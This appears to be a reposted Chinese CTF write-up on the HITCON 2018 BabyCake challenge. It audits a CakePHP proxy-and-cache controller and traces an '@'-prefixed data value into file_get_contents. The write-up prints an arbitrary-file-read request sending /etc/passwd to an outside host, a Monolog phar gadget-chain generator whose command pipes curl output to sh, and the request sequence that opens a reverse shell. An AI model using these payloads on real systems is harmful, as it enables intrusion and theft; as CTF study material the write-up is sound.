hitcon2018受虐笔记三:BabyCake学习
代码审计能力真是太太差了,下载下来一看20多M,当时就有点懵,最后连题目的业务逻辑处理过程都没有理解清楚….
拿到writeup之后,又自己分析了一遍,过程记录如下:
首先看到composer.json文件,知道代码使用了cakephp框架。
然后找源码的controller,主要业务逻辑的代码如下:
/*
filename : /src/Controller/PagesController.php
*/
<?php
namespace App/Controller;
use Cake/Core/Configure;
use Cake/Http/Client;
use Cake/Http/Exception/ForbiddenException;
use Cake/Http/Exception/NotFoundException;
use Cake/View/Exception/MissingTemplateException;
class DymmyResponse {
function __construct($headers, $body) {
$this->headers = $headers;
$this->body = $body;
}
}
class PagesController extends AppController {
private function httpclient($method, $url, $headers, $data) {
$options = [
'headers' => $headers,
'timeout' => 10
];
$http = new Client();
return $http->$method($url, $data, $options);
}
private function back() {
return $this->render('pages');
}
private function _cache_dir($key){
$ip = $this->request->getEnv('REMOTE_ADDR');
$index = sprintf('mycache/%s/%s/', $ip, $key);
return CACHE . $index;
}
private function cache_set($key, $response) {
$cache_dir = $this->_cache_dir($key);
if ( !file_exists($cache_dir) ) {
mkdir($cache_dir, 0700, true);
file_put_contents($cache_dir . "body.cache", $response->body);
file_put_contents($cache_dir . "headers.cache", serialize($response->headers));
}
}
private function cache_get($key) {
$cache_dir = $this->_cache_dir($key);
if (file_exists($cache_dir)) {
$body = file_get_contents($cache_dir . "/body.cache");
$headers = file_get_contents($cache_dir . "/headers.cache");
$body = "<!-- from cache -->/n" . $body;
$headers = unserialize($headers);
return new DymmyResponse($headers, $body);
} else {
return null;
}
}
public function display(...$path) {
$request = $this->request;
$data = $request->getQuery('data');
$url = $request->getQuery('url');
if (strlen($url) == 0)
return $this->back();
$scheme = strtolower(parse_url($url, PHP_URL_SCHEME) );
if (strlen($scheme) == 0 || !in_array($scheme, ['http', 'https']))
return $this->back();
$method = strtolower($request->getMethod() );
if ( !in_array($method, ['get', 'post', 'put', 'delete', 'patch']) )
return $this->back();
$headers = [];
foreach ($request->getHeaders() as $key => $value) {
if (in_array( strtolower($key), ['host', 'connection', 'expect', 'content-length'] ))
continue;
if (count($value) == 0)
continue;
$headers[$key] = $value[0];
}
$key = md5($url);
if ($method == 'get') {
$response = $this->cache_get($key);
if (!$response) {
$response = $this->httpclient($method, $url, $headers, null);
$this->cache_set($key, $response);
}
} else {
$response = $this->httpclient($method, $url, $headers, $data);
}
foreach ($response->headers as $key => $value) {
if (strtolower($key) == 'content-type') {
$this->response->type(array('type' => $value));
$this->response->type('type');
continue;
}
$this->response->withHeader($key, $value);
}
$this->response->body($response->body);
return $this->response;
}
}
程序主要会接收用户提交的两个参数data和url:
$data = $request->getQuery('data');
$url = $request->getQuery('url');
然后获取用户的请求方式,支持 ['get', 'post', 'put', 'delete', 'patch']
,然后利用同样的请求方式去请求url参数的地址,同时携带上data参数的内容,和用户的header。url支持的协议只有http和https:
if ( !in_array($method, ['get', 'post', 'put', 'delete', 'patch']) )
return $this->back();
$headers = [];
foreach ($request->getHeaders() as $key => $value) {
if (in_array( strtolower($key), ['host', 'connection', 'expect', 'content-length'] ))
continue;
if (count($value) == 0)
continue;
$headers[$key] = $value[0];
}
if ($method == 'get') {
$response = $this->cache_get($key);
if (!$response) {
$response = $this->httpclient($method, $url, $headers, null);
$this->cache_set($key, $response);
}
} else {
$response = $this->httpclient($method, $url, $headers, $data);
}
但这里面对GET请求是单独处理的,因为对GET请求做了一个cache:
private function cache_set($key, $response) {
$cache_dir = $this->_cache_dir($key);
if ( !file_exists($cache_dir) ) {
mkdir($cache_dir, 0700, true);
file_put_contents($cache_dir . "body.cache", $response->body);
file_put_contents($cache_dir . "headers.cache", serialize($response->headers));
}
}
private function cache_get($key) {
$cache_dir = $this->_cache_dir($key);
if (file_exists($cache_dir)) {
$body = file_get_contents($cache_dir . "/body.cache");
$headers = file_get_contents($cache_dir . "/headers.cache");
$body = "<!-- from cache -->/n" . $body;
$headers = unserialize($headers);
return new DymmyResponse($headers, $body);
} else {
return null;
}
}
跟一下如果不是GET请求,之后的代码:
private function httpclient($method, $url, $headers, $data) {
$options = [
'headers' => $headers,
'timeout' => 10
];
$http = new Client();
return $http->$method($url, $data, $options);
}
跟踪一下POST请求的处理过程:
/*
filename: ./vendor/cakephp/cakephp/src/Http/Client.php
*/
public function post($url, $data = [], array $options = [])
{
$options = $this->_mergeOptions($options);
$url = $this->buildUrl($url, [], $options);
return $this->_doRequest(Request::METHOD_POST, $url, $data, $options);
}
调用了_doRequest方法,跟一下:
protected function _doRequest($method, $url, $data, $options)
{
$request = $this->_createRequest(
$method,
$url,
$data,
$options
);
return $this->send($request, $options);
}
继续跟踪_createRequest方法:
protected function _createRequest($method, $url, $data, $options)
{
$headers = isset($options['headers']) ? (array)$options['headers'] : [];
if (isset($options['type'])) {
$headers = array_merge($headers, $this->_typeHeaders($options['type']));
}
if (is_string($data) && !isset($headers['Content-Type']) && !isset($headers['content-type'])) {
$headers['Content-Type'] = 'application/x-www-form-urlencoded';
}
$request = new Request($url, $method, $headers, $data);
$cookies = isset($options['cookies']) ? $options['cookies'] : [];
/** @var /Cake/Http/Client/Request $request */
$request = $this->_cookies->addToRequest($request, $cookies);
if (isset($options['auth'])) {
$request = $this->_addAuthentication($request, $options);
}
if (isset($options['proxy'])) {
$request = $this->_addProxy($request, $options);
}
return $request;
}
继续跟踪 $request = new Request($url, $method, $headers, $data);
,
/*
filename:./vendor/cakephp/cakephp/src/Http/Client/Request.php
*/
// 看Request 类的构造函数:
public function __construct($url = '', $method = self::METHOD_GET, array $headers = [], $data = null)
{
$this->validateMethod($method);
$this->method = $method;
$this->uri = $this->createUri($url);
$headers += [
'Connection' => 'close',
'User-Agent' => 'CakePHP'
];
$this->addHeaders($headers);
$this->body($data);
}
//看一下body方法
public function body($body = null)
{
if ($body === null) {
$body = $this->getBody();
return $body ? $body->__toString() : '';
}
if (is_array($body)) {
$formData = new FormData();
$formData->addMany($body);
$this->header('Content-Type', $formData->contentType());
$body = (string)$formData;
}
$stream = new Stream('php://memory', 'rw');
$stream->write($body);
$this->stream = $stream;
return $this;
}
如果 $data
是一个数组,就会调用
$formData = new FormData();
$formData->addMany($body);
$this->header('Content-Type', $formData->contentType());
$body = (string)$formData;
跟踪一下 FromData
类的 addMany
函数
public function addMany(array $data)
{
foreach ($data as $name => $value) {
$this->add($name, $value);
}
return $this;
}
public function add($name, $value = null)
{
if (is_array($value)) {
$this->addRecursive($name, $value);
} elseif (is_resource($value)) {
$this->addFile($name, $value);
} elseif (is_string($value) && strlen($value) && $value[0] === '@') {
trigger_error(
'Using the @ syntax for file uploads is not safe and is deprecated. ' .
'Instead you should use file handles.',
E_USER_DEPRECATED
);
$this->addFile($name, $value);
} elseif ($name instanceof FormDataPart && $value === null) {
$this->_hasComplexPart = true;
$this->_parts[] = $name;
} else {
$this->_parts[] = $this->newPart($name, $value);
}
return $this;
}
如果 $value
是用@开头的,则调用 addFile
方法:
public function addFile($name, $value)
{
$this->_hasFile = true;
$filename = false;
$contentType = 'application/octet-stream';
if (is_resource($value)) {
$content = stream_get_contents($value);
if (stream_is_local($value)) {
$finfo = new finfo(FILEINFO_MIME);
$metadata = stream_get_meta_data($value);
$contentType = $finfo->file($metadata['uri']);
$filename = basename($metadata['uri']);
}
} else {
$finfo = new finfo(FILEINFO_MIME);
$value = substr($value, 1);
$filename = basename($value);
$content = file_get_contents($value);
$contentType = $finfo->file($value);
}
$part = $this->newPart($name, $content);
$part->type($contentType);
if ($filename) {
$part->filename($filename);
}
$this->add($part);
return $part;
}
如果value不会resource,就会带入file_get_contents中处理,也就是说可以控制file_get_contents的参数,造成一个任意文件读取:
http http://13.230.134.135//?url/=http://wonderkun.cc:8888//&data/[x/]/=@/etc/passwd 1=1
在服务器端就可以收到/etc/passwd的内容。
因为可以完全控制file_get_contents的参数,所以可以利用 phar://
协议触发反序列化,进而 getshell。大致思路如下:
1.构造相应的 payload
2.将相应的 payload 放入某个 phar 文件中,并放到我们的服务器上
3.通过题目提供的功能访问我们服务器上的 phar 文件,此时相应文件被写入缓存中,具体路径为/var/www/html/tmp/cache/mycache/CLIENT_IP/MD5(http://IP/xxz.phar)/body.cache
4.通过 post
请求 phar://
协议的反序列化进而触发我们的 payload
看到vender中monolog,可以利用这个类来构造执行链。
https://github.com/ambionics/phpggc/blob/master/gadgetchains/Monolog/RCE/1/gadgets.php
<?php
namespace Monolog/Handler
{
class SyslogUdpHandler
{
protected $socket;
function __construct($x)
{
$this->socket = $x;
}
}
class BufferHandler
{
protected $handler;
protected $bufferSize = -1;
protected $buffer;
# ($record['level'] < $this->level) == false
protected $level = null;
protected $initialized = true;
# ($this->bufferLimit > 0 && $this->bufferSize === $this->bufferLimit) == false
protected $bufferLimit = -1;
protected $processors;
function __construct($methods, $command)
{
$this->processors = $methods;
$this->buffer = [$command];
$this->handler = clone $this;
}
}
}
namespace{
$cmd = "curl http://wonderkun.cc:3000/wonderkun.cc:888|sh";
$obj = new /Monolog/Handler/SyslogUdpHandler(
new /Monolog/Handler/BufferHandler(
['current', 'system'],
[$cmd, 'level' => null]
)
);
$phar = new Phar('exploit.phar');
$phar->startBuffering();
$phar->addFromString('test', 'test');
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($obj);
$phar->stopBuffering();
}
讲生成 exploit.phar
放到 wonderkun.cc/exploit.phar
,然后依次访问
http http://13.230.134.135/?url=http://wonderkun.cc/exploit.phar http http://13.230.134.135//?url/=http://www.wonderkun.cc/index.html//&data/[x/]/=@phar:///var/www/html/tmp/cache/mycache/x.x.x.x/6a2d709b1f3953e11d7cbfd14b322af4/body.cache 1=1
就成功的反弹了shell。
正文到此结束
- 本文标签: HTML client ORM 缓存 remote tar App build trigger Proxy cmd CEO Connection 代码审计 BIO 源码 js UDP 参数 下载 cookies 协议 https 代码 value ACE id 服务器 git GitHub key http Master PHP struct UI json core IO stream ip parse src cache Agent shell cat
- 版权声明: 本文为互联网转载文章,出处已在文章中说明(部分除外)。如果侵权,请联系本站长删除,谢谢。
- 本文海报: 生成海报一 生成海报二
热门推荐
相关文章
近期评论
-
文章和留言都翻到11页了 没有OOM
-
-
朋友,翻页到11页,及以后,会出现OOM,无法访问
-
-
搞个gitee的项目
-
-
版本号是多少,你可以下载哪个代码仓库,jdk选1.8 直接跑就行
-
-
-
Loading...
![[HBLOG]公众号](https://www.liuhaihua.cn/img/qrcode_gzh.jpg)
